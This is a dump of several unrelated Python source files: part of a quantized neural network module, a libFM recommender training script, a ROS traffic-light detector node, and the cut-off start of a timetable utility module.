regularizer=self.kernel_regularizer,\n constraint=self.kernel_constraint)\n\n if self.use_bias:\n self.lr_multipliers = [self.kernel_multiplier, self.bias_multiplier]\n self.bias = self.add_weight(shape=(self.filters,),\n initializer=self.bias_initializer,\n name='bias',\n regularizer=self.bias_regularizer,\n constraint=self.bias_constraint)\n\n else:\n self.lr_multipliers = [self.kernel_multiplier]\n self.bias = None\n\n \"\"\"\n Specifies the rank, dtype and shape of every input to a layer.\n\n Layers can expose (if appropriate) an `input_spec` attribute:\n an instance of `InputSpec`, or a nested structure of `InputSpec` instances\n (one per input tensor). These objects enable the layer to run input\n compatibility checks for input structure, input rank, input shape, and\n input dtype.\n\n A None entry in a shape is compatible with any dimension,\n a None shape is compatible with any shape.\n \"\"\"\n self.input_spec = InputSpec(ndim=2, axes={-1: input_dim})\n self.built = True\n\n def call(self, inputs):\n quantized_kernel = Quantized_optimizers.quantize(self, self.kernel, nb=self.nb)\n\n inverse_kernel_multiplier = 1. / self.kernel_multiplier\n inputs_qnn_gradient = (inputs - (1. - 1. / inverse_kernel_multiplier) * K.stop_gradient(inputs)) \\\n * inverse_kernel_multiplier\n\n outputs_qnn_gradient = K.conv2d(\n inputs_qnn_gradient,\n quantized_kernel,\n strides=self.strides,\n padding=self.padding,\n data_format=self.data_format,\n dilation_rate=self.dilation_rate)\n\n outputs = (outputs_qnn_gradient - (1. - 1. / self.kernel_multiplier) *\n K.stop_gradient(outputs_qnn_gradient)) * self.kernel_multiplier\n\n if self.use_bias:\n outputs = K.bias_add(\n outputs,\n self.bias,\n data_format=self.data_format)\n\n if self.activation is not None:\n return self.activation(outputs)\n\n return outputs\n\n\ndef load_dataset(dataset):\n # Import Data, here data is a DataFrame.\n X = dataset[['AF_real', 'AF_imag']].values\n Y = dataset[['inp_real', 'inp_imag']].values\n # X = np.transpose(X)\n # Y = np.transpose(Y)\n # scale data\n # scale_data = MinMaxScaler()\n # X = scale_data.fit_transform(X)\n # Y = scale_data.fit_transform(Y)\n\n print(np.shape(X))\n print(np.shape(Y))\n # x_train, y_train, x_test, y_test = train_test_split(X, Y, test_size=0.3)\n X_train, X_test, Y_train, Y_test = train_test_split(np.array(X), np.array(Y), test_size=0.2)\n # X_val, X_test, Y_val, Y_test = train_test_split(X_val_and_test, Y_val_and_test, test_size=0.5)\n\n print(f'{X_train.shape}, {X_test.shape}, {Y_train.shape}, {Y_test.shape}')\n return X_train, X_test, Y_train, Y_test\n\n\nclass QNN_model:\n def __init__(self, problem: Problem):\n self.problem = problem\n # self.x = x\n self.epochs = 2000\n self.lr = 0.001 # Learning Rate\n self.decay = 0.000025\n\n # bits can be None, 2, 4, 8 , whatever\n self.bits = None\n self.wbits = 4\n self.abits = 4\n\n # width and depth\n self.nla, self.nlb, self.nlc = 2, 2, 2\n self.nfa, self.nfb, self.nfc = 64, 64, 64\n\n self.batch_size = 32\n\n # learning rate decay, factor => LR *= factor\n self.kernel_multiplier = 10\n self.decay_at_epoch = [0, 25, 80]\n self.factor_at_epoch = [1, 0.1, 1]\n\n self.channels = 3\n self.classes = 10\n self.dim = 32\n # regularization\n self.kernel_regularizer = 0.0\n self.activity_regularizer = 0.0\n self.progress_logging = 1\n # TODO: change dataset to my own data, and remove import line\n # dataframe_path = 'data.sqlite'\n # self.dataframe = pd.read_csv(dataframe_path)\n # self.dataset = self.dataframe.values\n # from tensorflow.keras.datasets import cifar10\n # self.dataset = cifar10\n # self.out_wght_path = 'weights.hdf5'\n\n def build_model(self):\n def quantized_relu(x):\n return Quantized_optimizers.quantized_relu(self, x, nb=self.abits)\n\n H = 1\n\n Conv_ = lambda s, f, i, c: ConvQuantized(kernel_size=(s, s), H=1, nb=self.wbits, filters=f, strides=(1, 1),\n padding='same', activation='linear',\n kernel_regularizer=l2(self.kernel_regularizer),\n kernel_multiplier=self.kernel_multiplier, input_shape=(i, c))\n Conv = lambda s, f: ConvQuantized(kernel_size=(s, s), H=1, nb=self.wbits, filters=f, strides=(1, 1),\n padding='same', activation='linear',\n kernel_regularizer=l2(self.kernel_regularizer),\n kernel_multiplier=self.kernel_multiplier)\n\n Dense_ = lambda f: DenseQuantized(units=f)\n Act = lambda: Activation(quantized_relu)\n\n # model for image classifications\n '''\n model = Sequential()\n model.add(Conv_(3, self.nfa, self.dim, self.channels))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n model.add(Act())\n\n \"\"\"\n Each tested network contains 4 stages. 3 QNN-blocks, each followed by a max-pooling\n layer and 1 fully-connected classification stage. Each QNN-block is defined by 2 parameters: the\n number of basic building blocks n and the layer width F.\n Every QNN-sequence is a cascade of a QNN-layer, followed\n by a batch-normalization layer and a quantized activation\n function.\n \"\"\"\n # block A\n for i in range(0, self.nla - 1):\n model.add(Conv(3, self.nfa))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n model.add(Act())\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n # block B\n for i in range(0, self.nlb):\n model.add(Conv(3, self.nfb))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n model.add(Act())\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n # block C\n for i in range(0, self.nlc):\n model.add(Conv(3, self.nfc))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n model.add(Act())\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n # Dense Layer\n model.add(Flatten())\n model.add(Dense(self.classes, use_bias=False))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n\n '''\n\n # model for prediction\n model = Sequential()\n model.add(Dense_(self.nfa))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n model.add(Act())\n\n # for i in range(0, self.nla - 1):\n model.add(Dense_(self.nfa))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n model.add(Act())\n # model.add(MaxPooling2D())\n\n # block B\n # for i in range(0, self.nlb):\n model.add(Dense_(self.nfb))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n model.add(Act())\n\n # # block C\n # for i in range(0, self.nlc):\n model.add(Dense_(self.nfc))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n model.add(Act())\n\n # Dense Layer\n model.add(Flatten())\n model.add(Dense(2))\n model.add(BatchNormalization(momentum=0.1, epsilon=0.0001))\n\n return model\n\n def plot_QNNmodel(self, hist, y_test, y_pred):\n plt.plot(hist.history['mean_squared_error'])\n # plt.plot(hist.history['val_acc'])\n plt.title('Model MSE')\n plt.xlabel('Epoch')\n plt.ylabel('MSE')\n plt.legend(['Train'], loc='upper right')\n plt.savefig('fig_mse_model.png')\n plt.show()\n\n plt.plot(hist.history['loss'])\n # plt.plot(hist.history['val_loss'])\n plt.title('Model loss')\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.legend(['Train'], loc='upper right')\n plt.savefig('fig_loss_model.png')\n plt.show()\n\n plt.plot(y_test[0], 'b-')\n plt.plot(y_pred[0], 'r-')\n plt.xlabel('Time', size=14)\n plt.ylabel('Value', size=14)\n plt.legend(['measured output', 'predicted output'], loc='upper right')\n plt.savefig('predict.png')\n plt.show()\n\n # plt.scatter(y_test, y_pred, color='blue', label='data')\n # plt.plot(y_pred, y_fit, color='red', linewidth=2, label='Linear regression\\n' + reg_label)\n # plt.title('Linear Regression')\n # plt.legend()\n # plt.xlabel('observed')\n # plt.ylabel('predicted')\n # plt.savefig('linear_regression.png')\n # plt.show()\n\n def train(self, problem):\n\n # learning rate schedule\n # def scheduler(epoch):\n # if epoch in self.decay_at_epoch:\n # index = self.decay_at_epoch.index(epoch)\n # factor = self.factor_at_epoch[index]\n # lr = K.get_value(model.optimizer.lr)\n #\n # # TODO: Add x_train to here.\n # IT = X_train.shape[0] / self.batch_size\n # current_lr = lr * (1. / (1. + self.decay * epoch * IT))\n # K.set_value(model.optimizer.lr, current_lr * factor)\n #\n # return K.get_value(model.optimizer.lr)\n\n model = self.build_model()\n # early_stop = EarlyStopping(monitor='loss', min_delta=0.001, patience=10, mode='min', verbose=1)\n # checkpoint = ModelCheckpoint(self.out_wght_path, monitor='val_mean_squared_error',\n # verbose=1, save_best_only=True,\n # mode='max', period=1)\n\n # TODO: The line bellow must be added, first specify the dataset, and then implement load_dataset\n X_train, X_test, Y_train, Y_test = load_dataset(problem.data)\n\n # lr_decay = LearningRateScheduler(scheduler)\n # adam = Adam(lr=self.lr, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=self.decay)\n model.compile(loss=tf.keras.losses.MeanSquaredError(), optimizer='adam', metrics=['mean_squared_error'])\n start = time.time()\n hist = model.fit(X_train, Y_train,\n batch_size=self.batch_size,\n epochs=self.epochs,\n verbose=self.progress_logging)\n # callbacks=[checkpoint, lr_decay])\n\n print(f'Training time : {time.time() - start} s')\n # plot_model(model, to_file='QNN_model.png', show_shapes=True, rankdir=\"LR\")\n with open('QNN_summary_model.txt', 'w') as file:\n with redirect_stdout(file):\n model.summary()\n model.save('QNN_model.h5')\n\n # min_max_scaler = MinMaxScaler()\n # X_test = min_max_scaler.fit_transform(X_test)\n\n y_pred = model.predict(X_test)\n # Unscale data\n # min_max_scaler = MinMaxScaler()\n # Xtest_us = min_max_scaler.inverse_transform(X_test)\n # Xtest_us = min_max_scaler.fit_transform(X_test)\n # ytest_us = min_max_scaler.inverse_transform(Y_test)\n # yp = min_max_scaler.inverse_transform(y_pred)\n # sp = Xtest_us[:,1]\n # plt.plot(sp,'r-',label='$T_1$ $(^oC)$')\n\n # regressor = LinearRegression()\n # regressor.fit(Y_test.reshape(-1, 1), y_pred[:, 0])\n # y_fit = regressor.predict(y_pred[:, 0].reshape(-1, 1))\n #\n # reg_intercept = round(regressor.intercept_, 4)\n # reg_coef = round(regressor.coef_.flatten()[0], 4)\n # reg_label = \"y = \" + str(reg_intercept) + \"*x +\" + str(reg_coef)\n loss, mse = model.evaluate(X_test, Y_test)\n print(f'loss = {loss}, and mse = {mse}')\n\n print(f'Y_test : {Y_test}')\n print(f'y_pred : {y_pred}')\n self.plot_QNNmodel(hist, Y_test, y_pred)\n","sub_path":"artap/NNQuantized.py","file_name":"NNQuantized.py","file_ext":"py","file_size_in_byte":34004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"241601134","text":"# encoding: utf-8\n\n\n\"\"\"\n@author: zoulixin\n@contact: zoulx15@mails.tsinghua.edu.cn\n@time: 16-12-23 上午11:36\n\"\"\"\n__all__ = [\"libFM_train\"]\nimport configs\nfrom sklearn.feature_extraction import DictVectorizer\nimport pywFM\nimport numpy as np\nimport util\nimport dataset\nimport theano\nimport collections\nimport scipy.sparse as sparse\n\nclass libFM_train():\n def __init__(self,config = configs.cf_libFM_config):\n # load data\n self.config = config\n util.log().init(self.config)\n self.get_data()\n self.train()\n pass\n\n def get_data(self):\n util.log().info(\"libFM load data\")\n data = dataset.movieLens(self.config)\n all, train_num, validation_num, test_num, max_sequence, min_sequence = data.get_seq_data()\n\n self.user_num = all.shape[0]\n self.item_num = self.config.item_num\n self.train_set = xrange(train_num + validation_num)\n self.test_set = range(train_num + validation_num, train_num + validation_num + test_num)\n self.out_dim = self.config.out_dim\n self.train_data, self.train_mask, self.test_data, self.test_mask = self.convert2libFM(all,self.train_set,self.test_set,self.out_dim)\n self.seen = np.sum(self.train_mask, axis=0)\n self.seen = self.seen * 1.0 / self.user_num\n self.convert2feature(self.train_data)\n\n self.train_x,self.train_y = self.convert2feature(self.train_data)\n self.test_x, self.test_y = self.convert2feature(self.test_data)\n # v = DictVectorizer()\n # self.train_x = v.fit_transform(train_x)\n # print type(self.train_x)\n # print self.train_x.shape\n # self.test_x = v.transform(test_x)\n # print self.test_x\n pass\n\n def convert2libFM(self,rating,train_set,test_set,out_dim):\n train_data = np.zeros(shape=(self.user_num, self.item_num), dtype=theano.config.floatX)\n train_mask = np.zeros(shape=(self.user_num, self.item_num), dtype=np.int8)\n test_data = np.zeros(shape=(self.user_num, self.item_num), dtype=theano.config.floatX)\n test_mask = np.zeros(shape=(self.user_num, self.item_num), dtype=np.int8)\n for i in train_set:\n subset = np.transpose(rating[i, :, :])\n row = list(subset[0, np.nonzero(subset[0, :] >= 0)][0])\n train_data[i, row] = subset[1, np.nonzero(subset[1, :] >= 0)][0]\n train_mask[i, row] = 1\n\n for i in test_set:\n subset = np.transpose(rating[i, :, :])\n row = list(subset[0, np.nonzero(subset[0, :] >= 0)][0])\n train_data[i, row[:-out_dim]] = subset[1, np.nonzero(subset[1, :] >= 0)][0][:-out_dim]\n train_mask[i, row[:-out_dim]] = 1\n test_data[i, row[-out_dim:]] = subset[1, np.nonzero(subset[1, :] >= 0)][0][-out_dim:]\n test_mask[i, row[-out_dim:]] = 1\n return train_data, train_mask, test_data, test_mask\n pass\n\n def convert2feature(self,rating_matrix):\n (x,y) = np.nonzero(rating_matrix)\n z = rating_matrix[x,y]\n data = []\n row = []\n col = []\n for i in xrange(x.shape[0]):\n data.append(1.0)\n row.append(i)\n col.append(x[i])\n data.append(1.0)\n row.append(i)\n col.append(x[i] + y[i])\n res = sparse.csr_matrix((data,(row,col)),shape=(x.shape[0],rating_matrix.shape[0]+rating_matrix.shape[1]),dtype=np.float16)\n return res,z\n\n\n # def load_data(self,data_path,ratio=0.1):\n # train_data = []\n # train_y = []\n # test_data = []\n # test_y = []\n # users = set()\n # items = set()\n # f = open(data_path)\n # lines = f.readlines()\n # pos = np.random.uniform(low=0.0,high=1.0,size=(len(lines,)))\n # i=0\n # for line in lines:\n # (user, movieid, rating, ts) = line.split('::')\n # if pos[i]<=ratio:\n # test_data.append({\"user_id\": str(user), \"movie_id\": str(movieid)})\n # test_y.append(float(rating))\n # else:\n # train_data.append({\"user_id\": str(user), \"movie_id\": str(movieid)})\n # train_y.append(float(rating))\n # users.add(user)\n # items.add(movieid)\n # i+=1\n # return (train_data, np.array(train_y),test_data,np.array(test_y),users, items)\n\n def metric_cal(self, pred_r, true_r, mask):\n se = []\n n = []\n for metric_cal in self.config.metrics:\n temp = metric_cal().cal(Pred_r=pred_r, True_r=true_r, mask=mask, rec_num=self.config.rec_num,\n indifferent=self.config.indifferent, seen=self.seen,\n feature=None)\n se.append(temp[0])\n n.append(temp[1])\n return se, n\n\n\n def train(self):\n # fm(preds, global_bias, weights, pairwise_interactions, rlog)\n fm = pywFM.FM(task=\"regression\",num_iter=1000)\n model = fm.run(self.train_x,self.train_y,self.test_x,self.test_y)\n self.user_feature = model[3][:self.user_num,:]\n self.item_feature = model[3][-self.item_num:,:]\n self.user_bias = np.zeros(shape=(self.user_num,self.item_num))\n self.item_bias = np.zeros(shape=(self.user_num,self.item_num))\n for i in xrange(self.user_num):\n self.user_bias[i,:] = model[2][i]\n for i in xrange(self.item_num):\n temp = self.item_num - i\n self.item_bias[:,i] = model[2][-temp]\n prediction = self.user_feature*np.transpose(self.item_feature) + model[1] + self.user_bias + self.item_bias\n pred = np.asarray(prediction[self.test_set, :])\n metric_result, n_value = self.metric_cal(pred_r=pred, true_r=self.test_data[self.test_set, :], mask=self.test_mask[self.test_set, :])\n metrics_value = []\n for i in xrange(len(self.config.metrics)):\n se = metric_result[i]\n n = n_value[i]\n if self.config.metrics[i].__name__ == \"RMSE\":\n res = np.sqrt(se / (n * 1.0 + 1e-8))\n else:\n res = se / (n * 1.0 + 1e-8)\n metrics_value.append(res)\n metrics_info = [str(self.config.metrics[i].__name__) + \": {0:.6f}\".format(metrics_value[i])\n for i in xrange(len(self.config.metrics))]\n util.log().info('Train :\\n' + str(metrics_info).replace(',', '\\n') )\n\n\n\n\nif __name__ == '__main__':\n pass\n pass","sub_path":"other/libFM.py","file_name":"libFM.py","file_ext":"py","file_size_in_byte":6591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"328915678","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import Int32\nfrom geometry_msgs.msg import PoseStamped, Pose\nfrom styx_msgs.msg import TrafficLightArray, TrafficLight, TrafficLightStateAndWP\nfrom styx_msgs.msg import Lane\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\nfrom light_classification.tl_classifier import TLClassifier\nimport tf\nimport cv2\nimport yaml\nimport math\nimport random\n\nimport matplotlib.pyplot as plt\n\nSTATE_COUNT_THRESHOLD = 3\nPROCESS_TL_GROUND_TRUTH = False\n\nWPS_TO_TL_FROM_STOP_LINE = 15 #mts\nDISTANCE_FROM_TL_FOR_PREDICTION = 120 #mts\n\nclass TLDetector(object):\n\n def __init__(self):\n\n rospy.init_node('tl_detector')\n\n self.pose = None\n self.waypoints = None\n self.camera_image = None\n self.lights = []\n\n # Currently used to fake notification of traffic light state using ground truth\n self.lights_ix = []\n self.lights_indices = False\n \n sub1 = rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)\n sub2 = rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)\n\n '''\n /vehicle/traffic_lights provides you with the location of the traffic light in 3D map space and\n helps you acquire an accurate ground truth data source for the traffic light\n classifier by sending the current color state of all traffic lights in the\n simulator. When testing on the vehicle, the color state will not be available. You'll need to\n rely on the position of the light and the camera image to predict it.\n '''\n sub3 = rospy.Subscriber('/vehicle/traffic_lights', TrafficLightArray, self.traffic_cb)\n sub6 = rospy.Subscriber('/image_color', Image, self.image_cb)\n\n config_string = rospy.get_param(\"/traffic_light_config\")\n self.config = yaml.load(config_string)\n self.tl_nearest_wps = [] # list of index of nearest waypoint to traffic lights\n self.wp_to_nearest_stopline_wp = {} # map from waypoint index to nearest tl stopline waypoint index\n\n self.upcoming_light_pub = rospy.Publisher('/traffic_waypoint',\n TrafficLightStateAndWP,\n queue_size=1)\n\n self.bridge = CvBridge()\n\n # construct TL classifier\n self.light_classifier = None\n if not PROCESS_TL_GROUND_TRUTH:\n self.light_classifier = TLClassifier()\n else:\n self.light_classifier = 1 # anything != None\n\n self.listener = tf.TransformListener()\n\n self.state = TrafficLight.UNKNOWN\n self.last_state = TrafficLight.UNKNOWN\n self.last_wp = -1\n self.state_count = 0\n\n rospy.spin()\n\n\n def initialized(self):\n\n if self.waypoints and self.light_classifier and self.pose:\n return True\n else:\n return False\n\n\n def pose_cb(self, msg):\n self.pose = msg\n\n\n def waypoints_cb(self, waypoints):\n self.waypoints = waypoints\n\n # Processing stop line positions\n # Since this function is called only once, doing this\n # calculation here should be fine\n stop_line_positions = self.config['stop_line_positions']\n rospy.loginfo(\"stop positions %s %d\", stop_line_positions, len(stop_line_positions))\n dl = lambda a, b: math.sqrt((a.x - b[0])**2 + (a.y - b[1])**2) \n for p in stop_line_positions:\n nearest_wp_idx = 0\n min_dist = 1e12\n for i in range(len(waypoints.waypoints)):\n d = dl(waypoints.waypoints[i].pose.pose.position, p) \n if d < min_dist:\n min_dist = d\n nearest_wp_idx = i\n self.tl_nearest_wps.append(nearest_wp_idx)\n\n # sort the list in case stop lines were not in order\n self.tl_nearest_wps.sort()\n\n rospy.loginfo(\"tl_nearest_wps %s\", self.tl_nearest_wps)\n # for p in self.tl_nearest_wps:\n # rospy.loginfo(\"tl waypoint %s\", waypoints.waypoints[p].pose.pose.position)\n\n # populate map from waypoint index to nearest stopline waypoint index\n wp_idx = 0\n for stop_wp_idx in self.tl_nearest_wps:\n while wp_idx <= stop_wp_idx:\n self.wp_to_nearest_stopline_wp[wp_idx] = stop_wp_idx\n wp_idx += 1\n\n while wp_idx < len(waypoints.waypoints):\n self.wp_to_nearest_stopline_wp[wp_idx] = 0 # loop around the track\n wp_idx += 1\n\n # # Randomly test few waypoints\n # for i in random.sample(range(len(waypoints.waypoints)), 10):\n # rospy.loginfo(\"idx:%d stop_idx:%d\", i, self.wp_to_nearest_stopline_wp[i])\n # i = self.tl_nearest_wps[0]\n # rospy.loginfo(\"idx:%d stop_idx:%d\", i, self.wp_to_nearest_stopline_wp[i])\n \n def image_cb(self, msg):\n \"\"\"Identifies red lights in the incoming camera image and publishes the index\n of the waypoint closest to the red light's stop line to /traffic_waypoint\n\n Args:\n msg (Image): image from car-mounted camera\n\n \"\"\"\n \n if not self.initialized():\n return\n\n self.has_image = True\n self.camera_image = msg\n\n # NOTE: Used to lookup light state from ground truth. Must be updated to use\n # process_traffic_lights function when ready\n if(PROCESS_TL_GROUND_TRUTH):\n light_wp, state = self.process_traffic_lights_ground_truth()\n else:\n light_wp, state = self.process_traffic_lights()\n \n '''\n Publish upcoming red lights at camera frequency.\n Each predicted state has to occur `STATE_COUNT_THRESHOLD` number\n of times till we start using it. Otherwise the previous stable state is\n used.\n '''\n notify_state = TrafficLightStateAndWP()\n \n if self.state != state:\n self.state_count = 0\n self.state = state\n self.state_first_detect_time = rospy.get_rostime()\n elif self.state_count >= STATE_COUNT_THRESHOLD:\n self.last_state = self.state\n #light_wp = (light_wp\n # if ((state == TrafficLight.RED) or (state == TrafficLight.YELLOW))\n # else -1)\n self.last_wp = light_wp\n if(light_wp != -1):\n notify_state.header.frame_id = '/tl_waypoint'\n notify_state.header.stamp = rospy.get_rostime()\n notify_state.wp_ix = light_wp\n notify_state.state = state\n notify_state.first_detect_time = self.state_first_detect_time\n \n self.upcoming_light_pub.publish(notify_state)\n \n else:\n if(self.last_wp != -1):\n notify_state.header.frame_id = '/tl_waypoint'\n notify_state.header.stamp = rospy.get_rostime()\n notify_state.wp_ix = self.last_wp\n notify_state.state = self.last_state\n notify_state.first_detect_time = self.state_first_detect_time\n self.upcoming_light_pub.publish(notify_state)\n \n self.state_count += 1\n\n\n def get_closest_waypoint(self, pose):\n \"\"\"Identifies the closest path waypoint to the given position\n https://en.wikipedia.org/wiki/Closest_pair_of_points_problem\n Args:\n pose (Pose): position to match a waypoint to\n\n Returns:\n int: index of the closest waypoint in self.waypoints\n\n \"\"\"\n #TODO implement\n return 0\n\n def get_light_state(self):\n \"\"\"Determines the current color of the traffic light\n\n Args:\n light (TrafficLight): light to classify\n\n Returns:\n int: State of traffic light (red, unknown)\n\n \"\"\"\n if(not self.has_image):\n self.prev_light_loc = None\n return TrafficLight.UNKNOWN\n\n cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, \"rgb8\") #bgr8\n\n #Get classification\n return self.light_classifier.get_classification(cv_image)\n\n def find_closest_tl_in_front(self, ego_waypoint_ix):\n\n #to handle wraparound\n last_tl_wp = self.tl_nearest_wps[len(self.tl_nearest_wps) - 1]\n \n if(ego_waypoint_ix > last_tl_wp + WPS_TO_TL_FROM_STOP_LINE):\n # We are about to wraparound. return the first wp in list\n closest_light_ix = self.tl_nearest_wps[0]\n\n # Approximation\n dist_to_tl = (self.dist(self.waypoints.waypoints[closest_light_ix].pose.pose.position,\n self.waypoints.waypoints[ego_waypoint_ix].pose.pose.position)\n + WPS_TO_TL_FROM_STOP_LINE)\n else:\n for light_wp_ix in self.tl_nearest_wps:\n if(ego_waypoint_ix > light_wp_ix + WPS_TO_TL_FROM_STOP_LINE):\n continue\n closest_light_ix = light_wp_ix\n break\n\n # Approximation\n dist_to_tl = (closest_light_ix + WPS_TO_TL_FROM_STOP_LINE) - ego_waypoint_ix\n\n return closest_light_ix, dist_to_tl\n \n \n def process_traffic_lights(self):\n \"\"\"Finds closest visible traffic light, if one exists, and determines its\n location and color\n\n Returns:\n int: index of waypoint closes to the upcoming stop line for a traffic light (-1 if none exists)\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n\n \"\"\"\n light = None\n\n # List of positions that correspond to the line to stop in front of for a given intersection\n # stop_line_positions = self.config['stop_line_positions']\n # if(self.pose):\n # car_position = self.get_closest_waypoint(self.pose.pose)\n\n ego_waypoint_ix = self.find_closest_waypoint_ix(self.pose,\n self.waypoints.waypoints)\n\n min_dist = 1e12\n closest_light_ix = 0\n closest_light_state = 0\n\n return_light_ix = -1\n return_light_state = TrafficLight.UNKNOWN\n\n closest_light_ix, dist_to_tl = self.find_closest_tl_in_front(ego_waypoint_ix)\n\n #rospy.loginfo(\" Ego index: %d pos: x:%f, y:%f\",\n # ego_waypoint_ix,\n # self.pose.pose.position.x,\n # self.pose.pose.position.y)\n\n #rospy.loginfo(\" Upcoming Light index: %d\",\n # closest_light_ix)\n\n return_light_ix = closest_light_ix\n\n # try to detect only if ego is within 120 mts before light\n if( dist_to_tl < DISTANCE_FROM_TL_FOR_PREDICTION): \n return_light_state = self.get_light_state()\n\n return return_light_ix, return_light_state\n #===========================================================================\n\n # ==========================================================================\n # Auxillary functions to implement process tl from ground_truth\n #\n def traffic_cb(self, msg):\n\n if not self.initialized():\n return\n\n self.lights = msg.lights\n\n # NOTE: Here we try to find the indices of the traffic lights\n # and save them in lights_ix. Even though this is a function\n # used to fake trffic_waypoint notification in absence of real\n # tl_detection, making sure that we dont have to lookup the ix\n # in every iteration\n # Also note that self.lights can be used to verify training of\n # for tl_detection using images.\n if(self.lights_indices == False):\n\n for ix, light in enumerate(self.lights):\n\n # Find and save index of every light\n \n #rospy.loginfo(\" Light:%d\", ix);\n #rospy.loginfo(\" Light state=%d\", light.state)\n #rospy.loginfo(\" (unknown=%d, green=%d, yellow=%d, red=%d)\",\n # light.UNKNOWN, light.GREEN, light.YELLOW, light.RED)\n #rospy.loginfo(\" Pose msg:\")\n #rospy.loginfo(\" position: x:%f y:%f z:%f\",\n # light.pose.pose.position.x,\n # light.pose.pose.position.y,\n # light.pose.pose.position.z);\n #rospy.loginfo(\" orientation: x:%f y:%f z:%f w:%f\",\n # light.pose.pose.orientation.x,\n # light.pose.pose.orientation.y,\n # light.pose.pose.orientation.z,\n # light.pose.pose.orientation.w);\n\n light_ix = []\n light_ix.append(light)\n light_wp = self.find_closest_waypoint_ix(light.pose, self.waypoints.waypoints)\n light_ix.append(light_wp)\n\n self.lights_ix.append(light_ix)\n \n #rospy.loginfo(\" Waypoint Index: %d\", light_wp)\n\n self.lights_indices = True\n \n else:\n\n # Update the state of the light\n for ix, light in enumerate(self.lights):\n self.update_light_state(light, self.lights_ix)\n\n \n def dist(self, p1, p2):\n x, y, z = p1.x - p2.x, p1.y - p2.y, p1.z - p2.z\n return math.sqrt(x*x + y*y + z*z)\n\n\n def find_closest_waypoint_ix(self, pose, waypoints):\n closest_dist = 999\n light_wp_index = 0\n \n for index, waypoint in enumerate(waypoints):\n \n distance = self.dist(waypoint.pose.pose.position,\n pose.pose.position)\n \n if distance < closest_dist:\n light_wp_index = index\n closest_dist = distance\n\n return light_wp_index\n\n\n def update_light_state(self, new_light, lights_ix):\n for light in lights_ix:\n if((light[0].pose.pose.position.x == new_light.pose.pose.position.x)\n and (light[0].pose.pose.position.y == new_light.pose.pose.position.y)):\n light[0].state = new_light.state\n break\n \n\n #processes traffic light using ground truth data and light postions from lights msg in traffic_cb\n # note - this is different than process_traffic_lights() where 'stop line positions' are used\n def process_traffic_lights_ground_truth(self):\n\n # 1. get closest_waypoint_index to ego_vehicle\n # 2. compare with closest waypoint_indeices of save light data\n # and return the closest\n\n ego_waypoint_ix = self.find_closest_waypoint_ix(self.pose,\n self.waypoints.waypoints)\n\n min_dist = 1e12\n closest_light_ix = 0\n closest_light_state = 0\n\n return_light_ix = -1\n return_light_state = TrafficLight.UNKNOWN\n \n # TODO: Fix wraparound\n for light in self.lights_ix:\n if(ego_waypoint_ix > light[1]):\n continue;\n dist_from_light = light[1] - ego_waypoint_ix\n #rospy.loginfo(\" ego_ix=%d, light_ix=%d\", ego_waypoint_ix, light[1])\n #rospy.loginfo(\" min_dist=%d, dist_form_light=%d\",\n # min_dist, dist_from_light)\n if(min_dist > dist_from_light):\n min_dist = dist_from_light\n closest_light_ix = light[1]\n closest_light_state = light[0].state\n\n\n #rospy.loginfo(\" Ego index: %d pos: x:%f, y:%f\",\n # ego_waypoint_ix,\n # self.pose.pose.position.x,\n # self.pose.pose.position.y)\n\n #rospy.loginfo(\" Upcoming Light index: %d\",\n # closest_light_ix)\n\n\n # Since this is just faking the detection/state of the light based on ground_truth\n # and the system keeps track of all lights on the track at any given time,\n # notify only if the lights are within a visible range. approximating.\n\n if ((closest_light_ix - ego_waypoint_ix) < 150):\n return_light_ix = closest_light_ix\n return_light_state = closest_light_state\n \n return return_light_ix, return_light_state\n #===========================================================================\n \nif __name__ == '__main__':\n try:\n TLDetector()\n except rospy.ROSInterruptException:\n rospy.logerr('Could not start traffic node.')\n","sub_path":"ros/src/tl_detector/tl_detector.py","file_name":"tl_detector.py","file_ext":"py","file_size_in_byte":16548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"636715898","text":"# -*- encoding: utf-8 -*-\n# Copyright 2016 Vinzor Co.,Ltd.\n#\n# comment\n#\n# 2016/3/19 lipeizhao : Init\n# 2016/6/21 fengyingcai: 对时间表进行排序,解决序号与时段排序不一致问题\n\nimport datetime\nimport subprocess\nimport os\nimport rsa\nfrom random import randint, choice\nimport string\nimport logging\nimport hashlib\nfrom binascii import hexlify,unhexlify\n\nfrom voluptuous import Schema, Required, All, Length, Range, Invalid\nfrom sqlalchemy import and_, cast, \\\n Integer\nimport requests\nimport shutil\n\nLOG = logging.getLogger(__name__)\n\ndef is_timetable_legal(timetable):\n \"\"\"判断时间表是否合法\n \" 合法条件: 每一节课的开始时间和结束时间不能为空,且每个时间点的设置都是递增的\n :rtype: object\n \"\"\"\n last_time = \"00:00\"\n last_time = int(last_time.replace(\":\",\"\"))\n values = [x for x in timetable.values()]\n values = sorted(values, key=lambda x: int(x['start_time'].replace(':', '')))\n\n for value in values:\n start_time = int(value[\"start_time\"].replace(\":\",\"\"))\n end_time = int(value[\"end_time\"].replace(\":\",\"\"))\n if start_time and end_time and start_time >= last_time and end_time > start_time:\n last_time = end_time\n else:\n return False\n return True\n\ndef check_time_conflict(start_time, end_time, periods):\n periods = 